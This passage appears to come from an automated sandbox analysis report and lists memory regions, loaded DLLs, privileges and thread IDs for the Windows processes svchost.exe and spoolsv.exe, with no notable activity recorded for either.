| gpapi.dll | 0x7ffaf3360000 | 0x7ffaf3382fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffaf3960000 | 0x7ffaf3992fff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x7ffaf3ab0000 | 0x7ffaf3b57fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ffaf3ca0000 | 0x7ffaf3cfcfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffaf3d00000 | 0x7ffaf3d16fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffaf41e0000 | 0x7ffaf41eafff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffaf4260000 | 0x7ffaf4287fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffaf4290000 | 0x7ffaf42fafff | Memory Mapped File | rwx |
|
|
|
- |
| sxs.dll | 0x7ffaf4300000 | 0x7ffaf4397fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffaf4440000 | 0x7ffaf4489fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffaf4490000 | 0x7ffaf44a2fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffaf4540000 | 0x7ffaf4583fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ffaf55b0000 | 0x7ffaf56f0fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffaf6ec0000 | 0x7ffaf6f64fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffaf7190000 | 0x7ffaf724dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ffaf7560000 | 0x7ffaf75c8fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffaf75d0000 | 0x7ffaf7675fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ffaf7680000 | 0x7ffaf7687fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Process #48: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #48 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k NetworkService |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x294 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Network Service |
| Enabled Privileges | SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E64
0x
E60
0x
2E4
0x
B00
0x
EC
0x
928
0x
6E4
0x
69C
0x
690
0x
684
0x
678
0x
650
0x
624
0x
488
0x
470
0x
45C
0x
440
0x
434
0x
430
0x
3E4
0x
300
0x
29C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x0000003b00000000 | 0x3b00000000 | 0x3b0fffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b10000000 | 0x3b10000000 | 0x3b1fffffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000003b50ae0000 | 0x3b50ae0000 | 0x3b50aeffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0x3b50af0000 | 0x3b50af0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000003b50b00000 | 0x3b50b00000 | 0x3b50b13fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000003b50b20000 | 0x3b50b20000 | 0x3b50b9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000003b50ba0000 | 0x3b50ba0000 | 0x3b50ba3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000003b50bb0000 | 0x3b50bb0000 | 0x3b50bb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000003b50bc0000 | 0x3b50bc0000 | 0x3b50bc1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x3b50bd0000 | 0x3b50c8dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000003b50d10000 | 0x3b50d10000 | 0x3b50d10fff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b50d20000 | 0x3b50d20000 | 0x3b50d20fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000003b50d30000 | 0x3b50d30000 | 0x3b50d30fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000003b50d40000 | 0x3b50d40000 | 0x3b50d40fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000003b50d50000 | 0x3b50d50000 | 0x3b50d56fff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b50d60000 | 0x3b50d60000 | 0x3b50ddffff | Private Memory | rw |
|
|
|
- |
| vsstrace.dll.mui | 0x3b50de0000 | 0x3b50de8fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000003b50df0000 | 0x3b50df0000 | 0x3b50df0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b50e00000 | 0x3b50e00000 | 0x3b50efffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000003b50f00000 | 0x3b50f00000 | 0x3b50fbffff | Pagefile Backed Memory | r |
|
|
|
- |
| winnlsres.dll | 0x3b50fc0000 | 0x3b50fc4fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000003b50fd0000 | 0x3b50fd0000 | 0x3b50fd6fff | Private Memory | rw |
|
|
|
- |
| winnlsres.dll.mui | 0x3b50fe0000 | 0x3b50feffff | Memory Mapped File | r |
|
|
|
- |
| mswsock.dll.mui | 0x3b50ff0000 | 0x3b50ff2fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000003b51000000 | 0x3b51000000 | 0x3b510fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000003b51100000 | 0x3b51100000 | 0x3b51287fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000003b51290000 | 0x3b51290000 | 0x3b51410fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000003b51420000 | 0x3b51420000 | 0x3b5151ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b51520000 | 0x3b51520000 | 0x3b5161ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b51620000 | 0x3b51620000 | 0x3b5171ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b51720000 | 0x3b51720000 | 0x3b5181ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b51820000 | 0x3b51820000 | 0x3b5191ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b51920000 | 0x3b51920000 | 0x3b51a1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b51a20000 | 0x3b51a20000 | 0x3b51b1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b51c20000 | 0x3b51c20000 | 0x3b51d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b51d20000 | 0x3b51d20000 | 0x3b51e1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b51e20000 | 0x3b51e20000 | 0x3b51f1ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x3b51f20000 | 0x3b52256fff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b52260000 | 0x3b5226ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b52270000 | 0x3b5227ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b52280000 | 0x3b5228ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b52290000 | 0x3b5229ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b522a0000 | 0x3b522affff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b522b0000 | 0x3b522bffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000003b52360000 | 0x3b52360000 | 0x3b52421fff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b52430000 | 0x3b52430000 | 0x3b52430fff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b52440000 | 0x3b52440000 | 0x3b52440fff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b52450000 | 0x3b52450000 | 0x3b52450fff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b52560000 | 0x3b52560000 | 0x3b5265ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000003b52660000 | 0x3b52660000 | 0x3b5266ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000003b52670000 | 0x3b52670000 | 0x3b5267ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000003b52680000 | 0x3b52680000 | 0x3b5268ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000003b52690000 | 0x3b52690000 | 0x3b5269ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000003b526a0000 | 0x3b526a0000 | 0x3b526affff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000003b526b0000 | 0x3b526b0000 | 0x3b526bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000003b526c0000 | 0x3b526c0000 | 0x3b526c6fff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b526d0000 | 0x3b526d0000 | 0x3b526d0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b526e0000 | 0x3b526e0000 | 0x3b526e0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b526f0000 | 0x3b526f0000 | 0x3b526f3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b52700000 | 0x3b52700000 | 0x3b52706fff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b52710000 | 0x3b52710000 | 0x3b5278ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000003b52790000 | 0x3b52790000 | 0x3b5279ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000003b527a0000 | 0x3b527a0000 | 0x3b527affff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000003b527b0000 | 0x3b527b0000 | 0x3b527bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000003b527c0000 | 0x3b527c0000 | 0x3b527cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000003b527d0000 | 0x3b527d0000 | 0x3b527dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000003b527e0000 | 0x3b527e0000 | 0x3b527effff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000003b527f0000 | 0x3b527f0000 | 0x3b527f1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b52800000 | 0x3b52800000 | 0x3b528fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b52900000 | 0x3b52900000 | 0x3b529fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b52a00000 | 0x3b52a00000 | 0x3b52afffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b52b00000 | 0x3b52b00000 | 0x3b52b00fff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b52b10000 | 0x3b52b10000 | 0x3b52b10fff | Private Memory | rw |
|
|
|
- |
| catdb | 0x3b52b20000 | 0x3b52b2ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b52b30000 | 0x3b52b3ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b52b40000 | 0x3b52b4ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b52b50000 | 0x3b52b5ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b52b60000 | 0x3b52b6ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b52b70000 | 0x3b52b7ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b52b80000 | 0x3b52b8ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000003b52b90000 | 0x3b52b90000 | 0x3b52b96fff | Private Memory | rw |
|
|
|
- |
| catdb | 0x3b52ba0000 | 0x3b52baffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b52bb0000 | 0x3b52bbffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b52bc0000 | 0x3b52bcffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b52bd0000 | 0x3b52bdffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b52be0000 | 0x3b52beffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b52bf0000 | 0x3b52bfffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000003b52c00000 | 0x3b52c00000 | 0x3b52cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b52d00000 | 0x3b52d00000 | 0x3b52dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b52e00000 | 0x3b52e00000 | 0x3b52efffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b52f00000 | 0x3b52f00000 | 0x3b52ffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b53000000 | 0x3b53000000 | 0x3b530fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b53100000 | 0x3b53100000 | 0x3b531fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b53200000 | 0x3b53200000 | 0x3b532fffff | Private Memory | rw |
|
|
|
- |
| catdb | 0x3b53300000 | 0x3b5330ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b53310000 | 0x3b5331ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b53320000 | 0x3b5332ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000003b53330000 | 0x3b53330000 | 0x3b53330fff | Private Memory | rw |
|
|
|
- |
| catdb | 0x3b53340000 | 0x3b5334ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b53350000 | 0x3b5335ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000003b53360000 | 0x3b53360000 | 0x3b53366fff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b53370000 | 0x3b53370000 | 0x3b533effff | Private Memory | rw |
|
|
|
- |
| catdb | 0x3b533f0000 | 0x3b533fffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000003b53400000 | 0x3b53400000 | 0x3b534fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b53600000 | 0x3b53600000 | 0x3b536fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b53700000 | 0x3b53700000 | 0x3b537fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b53800000 | 0x3b53800000 | 0x3b538fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b53900000 | 0x3b53900000 | 0x3b539fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b53a00000 | 0x3b53a00000 | 0x3b549fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b54a00000 | 0x3b54a00000 | 0x3b54c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b54c10000 | 0x3b54c10000 | 0x3b64c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b64c10000 | 0x3b64c10000 | 0x3b74c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000003b74c10000 | 0x3b74c10000 | 0x3b74c10fff | Private Memory | rw |
|
|
|
- |
| catdb | 0x3b74c20000 | 0x3b74c2ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b74c30000 | 0x3b74c3ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b74c40000 | 0x3b74c4ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b74c50000 | 0x3b74c5ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b74c60000 | 0x3b74c6ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b74c70000 | 0x3b74c7ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b74c80000 | 0x3b74c8ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b74c90000 | 0x3b74c9ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b74ca0000 | 0x3b74caffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b74cb0000 | 0x3b74cbffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b74cc0000 | 0x3b74ccffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b74cd0000 | 0x3b74cdffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b74ce0000 | 0x3b74ceffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b74cf0000 | 0x3b74cfffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b74d00000 | 0x3b74d0ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b74d10000 | 0x3b74d1ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b74d20000 | 0x3b74d2ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b74d30000 | 0x3b74d3ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b74d40000 | 0x3b74d4ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b74d50000 | 0x3b74d5ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b74d60000 | 0x3b74d6ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x3b74d70000 | 0x3b74d7ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5ff6e0000 | 0x7df5ff6e0000 | 0x7ff5ff6dffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff7871f8000 | 0x7ff7871f8000 | 0x7ff7871f9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7871fc000 | 0x7ff7871fc000 | 0x7ff7871fdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787200000 | 0x7ff787200000 | 0x7ff787201fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787202000 | 0x7ff787202000 | 0x7ff787203fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787204000 | 0x7ff787204000 | 0x7ff787205fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787206000 | 0x7ff787206000 | 0x7ff787207fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787208000 | 0x7ff787208000 | 0x7ff787209fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78720a000 | 0x7ff78720a000 | 0x7ff78720bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78720e000 | 0x7ff78720e000 | 0x7ff78720ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787210000 | 0x7ff787210000 | 0x7ff787211fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787212000 | 0x7ff787212000 | 0x7ff787213fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787214000 | 0x7ff787214000 | 0x7ff787215fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787216000 | 0x7ff787216000 | 0x7ff787217fff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 77 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #49: spoolsv.exe
0
0
| Information | Value |
|---|---|
| ID | #49 |
| File Name | c:\windows\system32\spoolsv.exe |
| Command Line | C:\Windows\System32\spoolsv.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x140 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeTcbPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege |
| Thread IDs |
0x
F44
0x
DEC
0x
DE8
0x
DD8
0x
DD0
0x
DCC
0x
DC0
0x
DBC
0x
42C
0x
480
0x
408
0x
144
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00026fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000090000 | 0x00090000 | 0x00093fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x000b1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x000c0000 | 0x0017dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x00447fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x005d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x0069ffff | Pagefile Backed Memory | r |
|
|
|
- |
| spoolsv.exe.mui | 0x006a0000 | 0x006a0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000006b0000 | 0x006b0000 | 0x006b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006c0000 | 0x006c0000 | 0x006c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x006d6fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006e0000 | 0x006e0000 | 0x006e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006f0000 | 0x006f0000 | 0x006f6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00700fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000720000 | 0x00720000 | 0x0075ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007a0000 | 0x007a0000 | 0x007dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000820000 | 0x00820000 | 0x0085ffff | Private Memory | rw |
|
|
|
- |
| localspl.dll.mui | 0x00860000 | 0x00873fff | Memory Mapped File | r |
|
|
|
- |
| wsdmon.dll.mui | 0x008c0000 | 0x008c0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000008d0000 | 0x008d0000 | 0x008d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008e0000 | 0x008e0000 | 0x008e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| msxml6r.dll | 0x008f0000 | 0x008f0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000900000 | 0x00900000 | 0x00906fff | Private Memory | rw |
|
|
|
- |
| win32spl.dll.mui | 0x00910000 | 0x00910fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000920000 | 0x00920000 | 0x0092ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00930000 | 0x00c66fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000c70000 | 0x00c70000 | 0x00d6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d70000 | 0x00d70000 | 0x00daffff | Private Memory | rw |
|
|
|
- |
| inetpp.dll.mui | 0x00db0000 | 0x00db0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00deffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000df0000 | 0x00df0000 | 0x00eeffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x00ef0000 | 0x00fcefff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000fd0000 | 0x00fd0000 | 0x010cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000010d0000 | 0x010d0000 | 0x012cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000012d0000 | 0x012d0000 | 0x0130ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001350000 | 0x01350000 | 0x0138ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001390000 | 0x01390000 | 0x013cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001410000 | 0x01410000 | 0x0144ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df5ffe40000 | 0x7df5ffe40000 | 0x7ff5ffe3ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff7fd9be000 | 0x7ff7fd9be000 | 0x7ff7fd9bffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7fd9c2000 | 0x7ff7fd9c2000 | 0x7ff7fd9c3fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7fd9c4000 | 0x7ff7fd9c4000 | 0x7ff7fd9c5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7fd9c8000 | 0x7ff7fd9c8000 | 0x7ff7fd9c9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7fd9ca000 | 0x7ff7fd9ca000 | 0x7ff7fd9cbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7fd9ce000 | 0x7ff7fd9ce000 | 0x7ff7fd9cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff7fd9d0000 | 0x7ff7fd9d0000 | 0x7ff7fdacffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff7fdad0000 | 0x7ff7fdad0000 | 0x7ff7fdaf2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff7fdaf5000 | 0x7ff7fdaf5000 | 0x7ff7fdaf5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7fdaf6000 | 0x7ff7fdaf6000 | 0x7ff7fdaf7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7fdafa000 | 0x7ff7fdafa000 | 0x7ff7fdafbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7fdafc000 | 0x7ff7fdafc000 | 0x7ff7fdafdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7fdafe000 | 0x7ff7fdafe000 | 0x7ff7fdafffff | Private Memory | rw |
|
|
|
- |
| spoolsv.exe | 0x7ff7fe0d0000 | 0x7ff7fe194fff | Memory Mapped File | rwx |
|
|
|
- |
| inetpp.dll | 0x7ffaded40000 | 0x7ffaded6dfff | Memory Mapped File | rwx |
|
|
|
- |
| win32spl.dll | 0x7ffaded70000 | 0x7ffadee41fff | Memory Mapped File | rwx |
|
|
|
- |
| drvstore.dll | 0x7ffadeef0000 | 0x7ffadefc2fff | Memory Mapped File | rwx |
|
|
|
- |
| fdpnp.dll | 0x7ffadefd0000 | 0x7ffadefe2fff | Memory Mapped File | rwx |
|
|
|
- |
| fundisc.dll | 0x7ffadeff0000 | 0x7ffadf019fff | Memory Mapped File | rwx |
|
|
|
- |
| webservices.dll | 0x7ffadf150000 | 0x7ffadf2cafff | Memory Mapped File | rwx |
|
|
|
- |
| wsdapi.dll | 0x7ffadf2d0000 | 0x7ffadf376fff | Memory Mapped File | rwx |
|
|
|
- |
| wsdmon.dll | 0x7ffadf380000 | 0x7ffadf413fff | Memory Mapped File | rwx |
|
|
|
- |
| usbmon.dll | 0x7ffadf470000 | 0x7ffadf4befff | Memory Mapped File | rwx |
|
|
|
- |
| localspl.dll | 0x7ffadf9f0000 | 0x7ffadfb05fff | Memory Mapped File | rwx |
|
|
|
- |
| tcpmon.dll | 0x7ffadffb0000 | 0x7ffadffe9fff | Memory Mapped File | rwx |
|
|
|
